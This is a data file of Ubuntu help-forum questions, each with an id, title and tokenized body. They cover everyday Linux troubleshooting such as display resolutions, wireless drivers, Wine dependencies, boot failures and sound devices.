470750	asus pa279q 2560x1440 resolution nvidia hdmi	this thread is covered in many posts here , but in the end none of them were useful to solve my issue . as the title says i d like to reach the full resolution on my 27inch monitor using an nvidia gforce gt 520m with hdmi output . i was actually able to reach that resolution uninstalling nvidia drivers and using nouveau plus inserting the new mode with xrandr , but , the quality is really bad , fonts are really blurred . i d like to know if this problem is solvable or if people in my situation just gave up and roll back to 1920x1200 resolution . afaiu the card is good enough for that resolution , ubuntu is updated to 14.04. maybe the xrandr settings is wrong ? how to properly configure it ? is there a way to use nvidia proprietary drivers so i can have opengl ?
470751	juju bootstrap time-zone 7:00 hours front of server	time problem i set the maas server and juju server to same time zone , when ever i try to run juju command the time stamp ( shown in log ) is 7:00 hours front of my servers time . 1 ) where the juju get time from ? ! 2 ) how can i set the juju time-zone it seems it set on utc !
470752	how to automatically save terminal command output to file	is there a way that i can save the terminal command output to a file , without having to write the command ' | tee /abc.txt ' every-time around ?
470756	how to setup automatic core dump on upstart script ?	the myapp is an application that crashes eventually . i would like to get the core dump of those crashes ... this is the upstart script i tried so far ... but it still does n't work description `` myupstart '' start on runlevel [ 2534 ] stop on runlevel [ ! 2534 ] script ulimit -c 10000 echo `` /var/crash/core. % e. % s. % u. % g. % p. % t '' > /proc/sys/kernel/core_pattern cd /path/to/app ./myapp end script respawn details : myapp works with drop of permissions . it starts as root [ of course ] and then switches to another username/group . is this a problem ? the following commands : ulimit -c 10000 echo `` /var/crash/core. % e. % s. % u. % g. % p. % t '' > /proc/sys/kernel/core_pattern they work on command line if i start the application manually , but they do n't work in the upstart script . why this difference ?
470757	easyshell does n't open terminal correctly on ubuntu	i 'm using easyshell plugin with eclipse kepler on ubuntu 14.04 the plugin works fin when i choose to explore a folder or a file but it does n't work if i choose to open the selected file\folder in a terminal . it always opens the terminal to my home folder . the configured gnome-terminal commands runs fine manually , but not through the plugin .
470758	symbolic links vs windows shortcuts ?	what are the differences between symbolic links in ubuntu and windows shortcuts ? are they analogous concepts ? or is there something in ubuntu that resembles more windows shortcuts ?
470760	yo frankie game not working	i have installed yo frankie game on 14.04 lts . when i open the game it shows some clouds moving on the screen . no menu appears . what should i do ?
470761	restoring backup with tar	hi i'am usin ubuntu server 14.04 i want to backup all data in /mnt/backups/ ( pictures music etc . ) i use : tar -cvpzf backup.tar.gz /mnt/backups/ and i want recover into /home/john/recover/ i use : tar âxvpzf backup.tar.gz âc /home/john/recover/ but then i recover in /home/john/recover it looks like : /home/john/recover/mnt/backups/ ( and all my data , pictures music etc . ) is there a way to make /home/john/recover/ ( and all my data , pictures music etc . ) or i do something wrong or its just what tar does ? thanks . p.s . sorry for any spelling mistakes : ) )
470762	driver wireless network card - acer aspire 3000	iinstalled ubuntu 14.04 a acer aspire 3000 . it does not recognize the wireless network card . i 'm new on linux . someone can tell me where can i download . thank you
470766	samsung np350u2b screen brightness out of control after 14.04 do-release-upgrade	i have upgraded 13.10 to 14.04 on my samsung np350u2b notebook . everything works fine except that when i put the notebook into standby then powerup again , screen backlight becomes darker and i can not make brighter again till i reboot the system . fn+hotkey seems to working on the screen . visually i can down/up the backlight with hotkeys but in reality it 's effectless .
470767	one of my two cores suddenly flatlines at zero percent	i 've been using ubuntu for about three months , and twice now the first core of my dual-core laptop suddenly flatlined at zero percent for no apparent reason , while the second one seemed unaffected . does anyone know why this may be happening ? should i be worried ? edit : here are some screenshots . the first one was taken soon after it happened .
470770	repair unity panel & dash after compiz settings change	i played a little with the compiz settings and the unity top panel and dash disappeared . they are n't loaded anymore . i tried all suggestions posted here but i had no success . temporary i installed kubuntu-desktop ( kde ) that runs fine , but i want unity back . how can i do this ? solution i posted my solution here , as answer .
470774	wifi does n't always connect on 14.04	when i boot ubuntu 14.04 , wifi does n't always connect . it means that it works fine once in 3 reboots , but if it does n't connect , i ca n't make it work just with a reboot . when the connection is established it remains stable . of course everything worked fine with the previous version , this whole thing started after i upgraded . i have a dell inspiron 3521 , my lspci output for wireless is 08:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) have you seen such a problem ? do you have any ideas how to troubleshoot or debug this issue ? thanks
470775	i installed a custom .deb file that provided a package named `` python '' but now need to remove it	i think i may have botched my system . i have recently installed ubuntu 14.04 on my computer . one of the first things i did was install python 3.3 from source ( using make altinstall ) ; but then i realized that python 3.4 is already native in ubuntu 14.04 and decided to remove the python 3.3 installation . to do that , i followed the instructions on this post . unfortunately , only too late did i realize that this resulted in the creation a .deb file containing a package named `` python '' , which was subsequently installed . this had the effect of completely mangling my package system . any attempt to use apt-get produces many dependency errors like the one below : mercurial : depends : python ( > = 2.7 ) but it is not going to be installed depends : python ( < 2.8 ) but it is not going to be installed i tried to remove the custom package by running dpkg -r python_3.3.5-1_amd64.deb but it says that i need to remove by the name of the package , not the name of the file . and running dpkg -r python also fails : dpkg : dependency problems prevent removal of python : python-ubuntu-sso-client depends on python ( > = 2.7 ) . python-ubuntu-sso-client depends on python ( < < 2.8 ) . ... the first solution i came up with was to completely re-install ubuntu , but before i go ahead with that drastic solution , is there any way i can undo the effects of installing this custom `` python '' package ? can i somehow use the .deb file to remove the package from the system ( e.g . by removing the file sit provides and then resolving the dependencies by hand ) ? or did this `` python '' -named package mess up the packages beyond hope of recovery ?
470776	autostart a script after desktop loads	i am trying to autostart a script after the desktop loads . i 'm running xubuntu . i already tried putting a link into /ect/profile , and copying a .desktop into /.config/autostart/ . while this launches the script , it loads before the desktop does and then the desktop does not load until i close the script . how can i make it launch only after the desktop loads ? thank you ! edit : the script opens a java app that needs to run indefinitely .
470778	14.04 : volume keyboard shortcut stopped working	once i have started up the ubuntu 14.04 ( upgraded from 13.10 and 13.04 ) the media keyboard shortcuts was not working . as i did n't know why i tryed to set the volume down shortcut again ( it was set correctly when i started the keyboard shortcuts settings ) , which did n't have any effect , so i have rebooted the system . after the reboot the shortcut i did n't reset ( volume up ) works perfectly , however even after reseting the volume down shortcut again it does n't work . is there any way to fix this thing ? i have also tried unseting the shortcut and setting it again . the system is up-to-date linux lyra 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux curious thing : now when i press the volume down , and vlc player has focus , the volume of the vlc player goes down and when i press volume up , the system volume goes up this might be duplicate of ubuntu 14.04 lts - volume control keys but it is not answered , and also he sais he ca n't use the buttons at all , however i can use the volume up without issues
470779	problems with specific java application	iâm having an issue with a specific website . for my job i have to use a website called ojin , we use it for checking criminal background . but i 'm unable to click on the pop-up window to be able to highlight and copy specific text . it seems as though the window ignores any mouse interaction . i was wondering if anyone else has had this issue or knows of a possible solution . ubuntu : release 12.04 ( precise ) 64-bit kernel linux 3.8.0-39-generic java : java version `` 1.7.0_55 '' java ( tm ) se runtime environment ( build 1.7.0_55-b13 ) java hotspot ( tm ) 64-bit server vm ( build 24.55-b03 , mixed mode )
470781	how do i redirect input from one sound card to output on another sound card ?	i have a tv card with its sound output connected to the cd-in of my mainboard 's built-in sound card . there is also a usb sound device connected to my machine . now i want to play the sound from the tv card via the usb sound output . i tried the solutions proposed in how do i output my audio input ? but they do n't work for me . when i run those commands all i get is a lot of low frequency feedback that quickly adds up so that i need to terminate the command after a few seconds . the reasons for this seems to be that the input source selected in pavucontrol for my internal sound card is my microphone . however , the cd input does not show up in pavucontrol , it only shows up in alsamixer . is there something that i am missing here ? how can i play my cd-in from my internal sound card via my usb sound device ?
470782	how to change compiz workspace name from the command line ?	i 'm using the compiz workspace naming plugin , and i can change workspace names through ccsm just fine right now . however , i 'd like to be able to change the active workspace 's name from the command line , without having to launch ccsm and navigate the menu . i used to be able to do this using wnck , and this function in my bashrc : function wsname { python -c `` import wnck ; s = wnck.screen_get_default ( ) ; s.force_update ( ) ; \ s.get_active_workspace ( ) .change_name ( ' $ * ' ) '' }
470786	wireless adapter disconnects after suspend on 14.04	after suspending and resuming my machine , my wireless networking fails to reconnect . running nmcli nm shows the following : before : running state wifi-hardware wifi wwan-hardware wwan running connected enabled enabled enabled disabled after : running state wifi-hardware wifi wwan-hardware wwan running disconnected enabled enabled enabled enabled even running sudo service network-manager restart fails to do anything . only by restarting the machine have i been able to reconnect . edit : more info hardware : the wireless adapter is a rosewill rnx-n180ube . it is attached via usb to an asus h87i-plus motherboard . ( this is a custom-built pc ) running lsusb shows the following for the adapter : bus 003 device 002 : id 0bda:8172 realtek semiconductor corp. rtl8191su 802.11n wlan adapter
470787	wine installation	i am having troubles installing wine on my brand new install of ubuntu . i get the following error : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed e : unable to correct problems , you have held broken packages . i have the latest version of ubuntu .
470788	bootmgr is missing upon replacing boot partition with tmpfs	i recently mounted tmpfs in the place of my boot partition of by windows 7. this made the 100mb boot partition get added to swap but when i start windows 7 i get bootmgr is missing . i 've tried bootrec /fixbcd , bootrec /fixboot bootrec /rebuildbcd . none of these work even though rebuild bcd asked me whether to add c : \windows to active list and i said yes same error still persists . i even tried to check if my partition was inactive but its active . os-prober : can find only my ubuntu partiton boot info script : boot-repair i even tried to make my own bcd using bcdedit still bootmgr i think windows expects bootmgr at the first 100mb . my gparted : things that ive tried to use and repair and failed 1 ) boot-repair 2 ) bcdedit 3 ) bootrec 4 ) diskpart ( partition was already active ) is there any other way i can do this ... i dont want to install windows again is there anyway i can boot into windows without loosing data thank you john
470789	ubuntu 14.04 brightness keys do n't work anymore after dist-upgrade on thinkpad l430	i just updated my ubuntu system from 13.10 to 14.04 . after having fixed grub which broke on upgrading , i run into certain other problems . one of them is that the brightness adjustment keys of my l430 ( fn+f8 , fn+f9 ) do n't work anymore . what i already tried is these two solutions : lenovo l430 malefunction brightness control 13.04 http : //ubuntuguide.net/change-screen-brightness-with-fn-key-in-ubuntu-11-0410-10 unfortunately none of them worked . maybe one of you had similar problems and found a solution to it . thanks in advance for your help .
470791	i can not remove file from ktorrent 's queue manager	i can not remove file from ktorrent 's queue manager . kubuntu 14.04 , ktorrent 4.3.1 . the file has been downloaded and removed , but it keeps asking me if i want to recreate it . the queue manager even says it 's `` not queued '' . i ca n't right-click it , i ca n't use the delete key . i checked /home/kubu/.kde/share/apps/ktorrent/ and found the tor0 directory , which obviously refers to my file . can i delete it without a problem ? any ideas ?
470792	how to force resolution on ubuntu 14.04	hello ubuntu community as the title says , is there any way to tell ubuntu what resolution to use , even when it 's not listed in display settings ? or to add it in display settings ? i 'll be honest , i 'm not a ubuntu user , i know how to install it and use software center , but that is where my `` expertise '' ends . when i see `` ... open terminal ... '' i 'm lost . i installed 14.04 all is well , but about every 3rd , 4th time the computer is turned on it does n't recognize the display ( standard 19 '' monitor ) , and sets very low resolution . then i have to restart , sometimes it helps , sometimes it does n't . i tried googling , but solutions are for older versions of ubuntu ( i 'm afraid ill mess something up ) and far to technical for me with a bunch of commands that i have no idea what to do with them . i 'll be honest once more , i do n't have the time to learn everything there is to know about linux , and this is n't even my computer so if anyone would be so kind to give me a dumbed down step by step `` how to for idiots '' i would be very grateful . thank you in advance !
470794	youtube is playing at the wrong speed - maybe soundcard related	in the last couple of days i noticed that videos on youtube and the artistworks music school were playing slower than they should . i 've checked this in firefox and chrome . chrome is using html5 on youtube , otherwise they use flash . i think was okay before as i play along to stuff on guitar and notice if it 's out of tune . this is in kubuntu 14.04 on my new pc using an amd a8 6500 with 8gb . kernel is 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 athlon i686 gnu/linux i think this may be a general issue with media playback as audio in amarok is playing slow as well . there must be something that all playback uses as a clock to sync to . where do i find that ? i have an m-audio delta 66 audio card . maybe there 's a setting on that which is wrong . i 've been noticing some other sound issues , including distortion . it looks like the card thinks it is running at 48000 , but i think it 's actually at 44100 , which might explain the pitch shift . steve @ slarti : ~ $ cat /proc/asound/card2/pcm0p/sub0/hw_params access : mmap_interleaved format : s32_le subformat : std channels : 10 rate : 48000 ( 48000/1 ) period_size : 441 buffer_size : 3528 how should i tell it to use 44100 ?
470795	ubuntu vpn outside network connection issue	i am having a strange issue when connecting to my vpn . it kicks me off the internet . i have it setup in 'network settings ' ( due to that is the only way i was able to get it to work ) now , while i am able to access my network files that lie on the vpn ( the 10.x.x.x addresses ) , i am also able to access files on my local network ( my 192.x.x.x addresses ) , i am not able to go to http : //www.google.com , or do anything for that matter outside my local and vpn networks . i do notice an extra icon showing the vpn is connected , but there is another one i though was my lan icon that has an x on it . how can i do this ? i need to be able to connect to my vpn , and still have outside access ? route - no vpn connection kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.2.2 0.0.0.0 ug 0 0 0 eth1 192.168.2.0 * 255.255.255.0 u 1 0 0 eth1 route - with vpn connection kernel ip routing table destination gateway genmask flags metric ref use iface default * 0.0.0.0 u 0 0 0 ppp0 10.10.10.120 * 255.255.255.255 uh 0 0 0 ppp0 mail.emagineusa 192.168.2.2 255.255.255.255 ugh 0 0 0 eth1 mail.emagineusa 192.168.2.2 255.255.255.255 ugh 0 0 0 eth1 192.168.2.0 * 255.255.255.0 u 1 0 0 eth1 host - google.com google.com has address 74.125.226.64 google.com has address 74.125.226.69 google.com has address 74.125.226.71 google.com has address 74.125.226.66 google.com has address 74.125.226.65 google.com has address 74.125.226.72 google.com has address 74.125.226.78 google.com has address 74.125.226.73 google.com has address 74.125.226.70 google.com has address 74.125.226.67 google.com has address 74.125.226.68 google.com has ipv6 address 2607 : f8b0:4006:808 : :1006 google.com mail is handled by 30 alt2.aspmx.l.google.com . google.com mail is handled by 20 alt1.aspmx.l.google.com . google.com mail is handled by 40 alt3.aspmx.l.google.com . google.com mail is handled by 10 aspmx.l.google.com . google.com mail is handled by 50 alt4.aspmx.l.google.com . traceroute to 8.8.8.8 traceroute to 8.8.8.8 ( 8.8.8.8 ) , 30 hops max , 60 byte packets 1 10.10.10.120 ( 10.10.10.120 ) 46.576 ms 50.601 ms 51.521 ms 2 l300.bstnma-vfttp-81.verizon-gni.net ( 98.110.197.1 ) 52.778 ms 53.686 ms 53.706 ms 3 g0-14-2-0.bstnma-lcr-21.verizon-gni.net ( 130.81.218.198 ) 56.615 ms 61.274 ms 62.174 ms 4 ae9-0.bos-bb-rtr1.verizon-gni.net ( 130.81.163.164 ) 57.436 ms * * 5 * * * 6 * 0.xe-8-3-0.gw13.nyc1.alter.net ( 152.63.5.1 ) 62.251 ms 0.xe-8-1-0.gw13.nyc1.alter.net ( 152.63.4.133 ) 59.390 ms 7 204.148.18.206 ( 204.148.18.206 ) 63.106 ms 66.221 ms 63.127 ms 8 209.85.247.7 ( 209.85.247.7 ) 66.184 ms 67.259 ms 66.149 ms 9 72.14.236.206 ( 72.14.236.206 ) 62.044 ms 209.85.252.242 ( 209.85.252.242 ) 64.209 ms 209.85.252.250 ( 209.85.252.250 ) 65.193 ms 10 72.14.239.93 ( 72.14.239.93 ) 65.624 ms 209.85.249.11 ( 209.85.249.11 ) 68.308 ms 72.14.239.93 ( 72.14.239.93 ) 70.615 ms 11 66.249.95.229 ( 66.249.95.229 ) 78.416 ms 72.14.235.10 ( 72.14.235.10 ) 78.483 ms 64.233.174.11 ( 64.233.174.11 ) 77.413 ms 12 72.14.234.65 ( 72.14.234.65 ) 77.720 ms 78.676 ms 72.14.234.55 ( 72.14.234.55 ) 79.552 ms 13 google-public-dns-a.google.com ( 8.8.8.8 ) 74.189 ms 74.678 ms 75.782 ms
470796	fatal error : sys/cdefs.h : no such file or directory|	it has been weeks that i am trying to use code : :blocks ide to program atmega16 , however , i am hindered by the following error while compiling/building the program in c : :b /usr/include/features.h|374|fatal error : sys/cdefs.h : no such file or directory| i have read following thread . http : //stackoverflow.com/questions/9303037/ can not -compile-simple-c-program-in-ubuntu from the thread i have tried to purge libc6-dev and ran into trouble by removing the dependencies . from previous experience i knew that there is a huge probability to get into broken pipe error . i tackled it by installing the lost dependencies . now still i have the same error . experts please guide me . what should i do ? i use ubuntu 14.04 lts
470798	does ubuntu support for my laptop	am using lenovo thinkpad edge laptop model e430 with i5 processor,6gb ram and 500gb hdd with hd graphics . will it possible for me to install 64bit ubuntu 13.04 or 14.04 lts 64bit in my laptop . if so please suggest me . few months back i have tried with 13.04 64bitamd .iso file , but couldnt succeed . today after a while came to ububtu site and came to know 14.04lts . kindly please confirm me for assistance .
470800	ubuntu black screen 14.04	i was using ubuntu 14.04 for about 2 days now , and i restarted my pc ( lenovo yoga 2 pro ) no problems about the screen so far , chose ubuntu from boot menu , kubuntu logo shows up , screen goes black , backlights start working , but the screen is still black , the only thing i did was to restart the computer . now after choosing ubuntu from boot screen desktop will stay black no matter what i do i ca n't fix this problem , i 'm dual booting with windows on the same ssd and i can switch to windows 8.1 and there is n't any problem with windows . screen goes black right after it shows the kubuntu logo ( i ca n't get to the log in screen ) there is no cursor or anything showing , but backlights seem to be working .
470801	computer not asking for password after waking from sleep	i have recently installed ubuntu 14.04 and set up an account with a password . i configured the computer to ask for a password after waking up from a sleep however , i am still brought back to desktop without a lockscreen . computer specs : lenovo ideapad y580 : intel core i7-3630qm ( 2.4ghz with turbo up to 3.4 ) nvidia geforce gtx 660m and intel hd4000 ( optimus )
470803	how to remove burg-pc error	when applying any software from ubuntu software center it tells me that : errors were encountered while processing : burg-pc the software installed , but because of the error i need to remove it .
470805	keyboard locks and prevents typing	sometimes my keyboard locks . i mean i can use my mouse but nothing i type gets into screen . ( i guess it might be related with watching youtube videos ... but i think this happens even without youtube . ) even a key combination like ctrl+c is not getting through . the problem is definitely not with unplugged wire , as i am using my laptop ; ) i realize the problem might be caused by everything but to nail the range down maybe i could run some task to monitor some keyboard states ... i just have no clue what could i turn on or else do . to make things work again i have to at least suspend my laptop and then i can type . logging out does not solve the problem , only suspending and restarting my computer . any idea how to solve it ?
470810	connecting to network problems	i have an ubuntu 12.10 hp laptop . i 'm having trouble with connecting to this one certain network . the network itself seems to be working well for everyone else that 's using it , so it seems to be just my laptop ... . the network is n't hidden and it does n't have a password at all , so it 's not that type of problem . what happened was this : i was using the network , it was fast and good as usual , and then i simply closed my laptop for a moment to go to the bathroom . when i returned i opened my laptop and turned it on , typed in the password to unlock the laptop -- usually my laptop will start connecting or already be connected to the network , but this time it did n't . i noticed i only have this problem with that specific network and not any of the others . i do n't think my laptop has been blocked or anything from using it though , as i 've already asked and i 'm sure i could n't have been blocked during the time i left to use the bathroom . i 've been trying things for hours and i do n't want to have to buy a new laptop -- is there a way to fix this ? status : restarted my laptop again , still the same ._ .
470811	laptop audio suddenly gone	i was forced to hard boot my laptop while running ubuntu 13.04 , and after that the os seems to have lost it 's sound capability . i 've been following the troubleshooting guide here : https : //help.ubuntu.com/community/soundtroubleshootingprocedure i 've reached step 3 without any luck . here 's partial output to ./alsa-info.sh ! ! alsa version ! ! -- -- -- -- -- -- driver version : k3.11.0-12-generic library version : utilities version : 1.0.27.1 as you can see my library version is completely blank . any idea what might 've gone wrong here ? the guide says nothing about what to do if the library version is blank . http : //pastebin.com/ddf62jz9 this is the entire output to ./alsa-info.sh ps : i 've had the same problem earlier triggered by the same event . sadly i do n't remember how it got solved .
470814	how to access system settings when ubuntu menu is broken ?	i 've seen this bug a number of times on several installations , but as yet i 'm not sure how to reproduce it . basically the system settings item on the `` gear '' menu stops working . it 's not grayed out or anything . it just ignores my click or enter key . any clue how to work around this , like how to launch it from the command line or how to actually fix this problem ?
470817	boot loader wo n't load	i think it is the os boot manager because it is the first item on `` boot order '' . any ways when ubuntu loads the first screen i get has purple edges around it ( this must be the boot-loader ) . i do n't know any of the livecd stuff ... i just want to boot windows 8 without virtual box . it does n't matter if my stuff is on it or not . i either want to restore windows 8 or load it .
470820	missing mouse after switching account	i have an old acer aspire 6920g with ubuntu 14.04 and lightdm installed keeping the existing /home partition and two working users . when i switch from a user to the other i miss the mouse on the second account . looking around i found this solution : sudo modprobe -r psmouse ; sudo modprobe psmouse but it is too unhandy for my wife : ) it will be working to add it on an hypotetic switch user event . but i do n't know if there is something like this for lightdm . does someone have a solution ? thank you very much .
470823	ubuntu 14.04 lts maas boot fails on fresh install on a dell 2950	i 've just installed the latest version of 14.04 lts on a dell 2950 ( bios revision 2.7.0 ) with a 5tb raid array , made up of 4 , 2 tb sata drives and the perc 5/i raid controller ( firmware : 5.1.1-0040 ) . i installed the multiple server install with maas , using this server as the primary maas server . the installer detects the drive without an issue , and there are no problems on installation , but when i boot the new os for the first time , i get the following grub error : attempt to read or write outside of disk hd0 . i 've previously installed debian 7.4 on this disk with no issue whatsoever , and even deleting all the previous partitions before re-installing ubuntu has failed to change anything . i have n't been able to coax grub into loading the operating system from the disk either . your help in diagnosing and fixing this problem is greatly appreciated . edited to add : here also is a screenshot of my efforts to manually load grub from the disk . perhaps i 'm doing something wrong , but honestly ? the ubuntu installer should have this right off the bat .
470824	wine installation problem after apt-get update	since a sudo apt-get update , wine is no longer recognized by ubuntu ( as if i removed the package ) . i decided to clean it completely and tried to install wine again without success . os : ubuntu 13.10 64 bits output of sudo apt-get install wine the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed output of : sudo apt-get install wine1.6 the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1:1.6.1-0ubuntu1~ppa1 ) e : unable to correct problems , you have held broken packages . i found many different potential solutions on askubuntu , but no one works : ( thanks in advance edit : output of sudo apt-cache policy wine wine : installed : ( none ) candidate : 1:1.7.18-0ubuntu1~saucy1 version table : 1:1.7.18-0ubuntu1~saucy1 0 500 http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ saucy/main amd64 packages 1.4.1-0ubuntu7 0 500 http : //archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages
470825	upgrade from 13.10 to 14.04 froze , forced shutdown , now i boot from grub to purple screen	( first two paragraphs is for posterity sake , to determine if i 'm dealing with the same problems . skip ahead for the current problem . ) previous installations of ubuntu had given me trouble with this , first with 12.10 when i first got my machine at the end of 2012 . attempted a dual boot , had to go through quite a few hoops to get it installed ( uefi , secure boot , nvidia driver , lenovo brightness keys ) , but ultimately i got it working , smoothly , without any errors by checking out answers here . well , the /boot was too far from the beginning of the hard drive ( i think ) , but that 's about it . upgrade to 13.10 gave me an error message , that was dealt with through a go of boot repair . file transfer process bar would n't show progress until it was finished , but that 's not a big deal . ( /end history ) i have a lenovo y400 , with a nvidia geforce gt650m 2gb . during upgrade to 14.04 , i was probably half way through , and it froze . i ca n't recall what section it was on of the install , but it was implementing the changes . forced shutdown , nothing responded . so i boot to grub ( gives me options for advanced ubuntu , and windows 8 - the windows 8 works fine ) . selecting ubuntu brings me to a blank purple screen , which does n't go away . i thought it was graphics related ( i 'd had this problem with 12.10 ) so i tried running in legacy mode , that just makes the purple screen take up a portion of the screen , otherwise black . tried running a liveusb of 14.04 to try boot repair , i have to be in legacy mode for the liveusb to work ( still points to graphics driver ) , but i ca n't install boot repair in liveusb and trying to change the driver from nouveau to proprietary does n't stick . nomodeset is already in the 'edit ' of the ubuntu option in grub . is there something i 'm missing ? recovery mode does n't seem to be working the way it 's supposed to , but i 've never used it so i would n't know . gets me to a list of options that all lead to 'run in read/write mode ' dialogue , but selecting any option there just creates a graphic glitch and gives me an unresponsive dialogue box and no mouse over a black screen . the option for going to root shell gets a black terminal that actually recognizes the name of my machine , like it would in gui terminal . should i be going this route ? i have a host of options i suspect , but they do n't seem to respond the same way as other q & a on here . i 'll keep looking on here . directions would be great . cheers , karly
470826	console freezes on auto-complete of /mnt/folder ( cifs ) share	i have a ubuntu 14.04 server that will lock up after an undetermined amount of time when you attempt to tab-auto-complete the path of a cifs share in the /mnt directory . i mount the share and it seems to work fine for a uncertain amount of time . i can do ls or run du on folders within the mounted share . then i will go to tab out a folder path and my console locks up . i can start a new session but it will lock as soon as i try to mess with the mounted share ; this even happens to other users if i have them try as well . i have no idea why this is happening ? i 've never seen this issue .
470830	`` files '' file manager utility 3.10.1 , how do i uninstall it ?	this thing just showed up one day . i already have dolphin and konqueror . it does n't show up on the taskbar . i am running kde , with kdm on ubuntu linux 14.04 . now every time i start my machine , this shows up with the documents folder open . i close it down , but every now and then it re-launches itself , yet , i ca n't find any representation of it anywhere , not even in task manager ( though it could be showing there under a different name ) .
470831	change permission to read write and execute	how do i change the following folder shown below `` manage '' to read write and execute permission ? what should i do ? drwxr-xr-x 2 root root 4096 may 22 08:15 /var/lib/ihris/sites/manage i used the ls -ld to view the permission rights of the folder . thank you ,
470835	how do i install peazip ? [ dependencies not satisfiable ]	i want to try this archiver , since i cant seem to drag srt files to vlc from file roller . but i get this error when trying to install the .deb i use lubuntu 14.04 lts i tried installing qt version but that brings up a different error .
470836	chrome os and ubuntu	i started using ubuntu a few weeks ago , so i decided to install it also on my chromebook . it feels so nice , but i get this error when i try to update ubuntu : w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems the problem is i did n't installed chrome at all in ubuntu , i have the bad feeling that the chrome os is troubleshooting it ( even it is in dual boot an should be on its own partition ) . also wine can not be installed . the forum has some answers for the error , but i just started with ubuntu so it would be nice if you could help me . so how to fix it and is chrome os the problem ? is it not properly installed ? last night i installed it 3 times and i already fixed the update problem . ( in the settings of the software center there were 2 indentical links for updates , i just deleted one ) , but wine still does n't work like andrew mentioned , i believe wine wants the 32-bit version , but i have the hp 14 chromebook which is definitely 64-bit and i installed 64-bit ubuntu 14.04 lts ! the error says : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1:1.6.2-0ubuntu4 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : ttf-wqy-microhei recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . wine issues with installing there seems to be a solution , but i dont want to install the 32 bit on my 64bit ? ? ? isnt that a kind of `` downgrading '' ? doesnt that cause more problems ?
470837	how to show hidden folders in 14.04 ubuntu	how do you show a hidden folder ( specifically .minecraft ) in ubuntu 14.04 ? i am somewhat new to ubuntu 14.04 and ca n't seem to find the `` view '' menu .
470839	how can i choose the audio output device using the terminal ?	i have a digital headphone set and an analog pair of speakers . is there a way for me to switch between them in the terminal in ubuntu ? i ask that because i would like to create a keyboard shortcut for this switch to make it simpler than having the tedious task of going to the audio settings using the mouse .
470840	how to recover deleted files in specific partitions ?	i had windows 8 installed on my computer and had four partitions . i installed ubuntu . and checked the option instead of windows 8 . instead of installing ubuntu in the partition it just formatted the while hard drive and made just one drive and all of the other data is gone . i want to recover those files how do i do it ?
470842	creating/removing a symbolic link when a usb device is connected/disconnected	i 'm working with an arduino board and matlab under linux . matlab , unfortunately , does n't recognize the arduino board when is connected unless i create a symbolic link to the arduino board in /dev by : sudo ln -s /dev/ttyacm0 /dev/ttyusbx where x is a number . i have to run this line every time i want to work with the board and arduino . so , my question is pretty simple : is it possible to automatically create this symbolic link exactly when the arduino board is connected and remove it when disconnected ?
470845	use ubuntu & windows in the same network and make share file	i work in a company that all of computers have windows os and we faced a lot of problems because of that , now we want to migrate to linux os like ubuntu , as our work is monitoring each person have to use 4-5 computer , 1-2 of them should be windows because we use some application which does n't support linux ( they are exe files ) how we can use one keyboard and mouse and link them to eachother ? ! would you please introduce the application ? ! in the other hand each team should share their data each hour , , , previously we used file share in windows but if we use both ( ubuntu & windows ) is there any program that could help us ? ! thank you in advance
470846	how long does ubuntu take to install ?	i have been installing for about 45 mins and the install bar is still white .
470850	drag and drop subrip-file ( .srt ) from file-roller ( archive manager ) to vlc ?	when i drag a subtitle file straight from an open zip like so : it does n't load the subtitle file . dragging the subtitles works only if i extract the subtitle file first and then drag it . is there a way to make it work straight from a zip file as it does in windows ? i use lubuntu 14.04 lts .
470854	games in ubuntu 14.04	first , i download small games , this game is only 2d and can only move left and right , but very lag . in windows xp , i can play gta 3 and vice city in full speed , cs 1.6 ( medium quality ) smoothly , nfs underground 2 little lag . so , this is because the os or because of a game that i downloaded ? if i download another game , whether it will lag too ? i have a netbook with intel atom n280 and 1gb of ram . edit i can play final fantasy vii using from software center pcsx smoothly in ubuntu .
470856	virtualbox does not detect usb-stick	i have ubuntu 14.04 lts and just installed the latest virtualbox 4.3 to use windows 7 . as explained here : set up usb-stick for virtualbox ; i added myself to the vboxusers and also installed the extension pack . however i still can not make virtualbox to detect any of my sticks , in order to add it to the filter list in the vm settings . there is still no virtualbox version for 14.04 , may this be an issue ?
470857	radeon vga-switcheroo	i read quite a bit about vga-switcheroo and wanted to activate it on my system : hp dv7-4263cl / ubuntu 14.04 / radeon 6370/4225 but from what i 've read and tried , it seems that these features are not available in 14.04 ? can anyone shed light on this ? i have quite a heat problem , and disabling the discrete graphics may do a little to help in this .
470863	why netbeans and php storm working at office but not at home ?	on the same laptop , they work fine when i 'm at the office . but when i 'm at home , netbeans can not start , it 's stuck at the 'loading modules ... ' screen , while php storm can start but the project explorer and editor windows do n't show up . do you have any idea ?
470865	no wireless connections show up .	i had a really slow computer ( acer aspire one ) with windows 7 , so i decided to install ubuntu to make it faster . everything went smooth but now when i 'm in it i have a problem , it does n't show any wireless connections and the light on my wireless adapter does n't shine . i tried restarting and also checking several times if my adapter is on . are there any solutions for this ? really need help please .
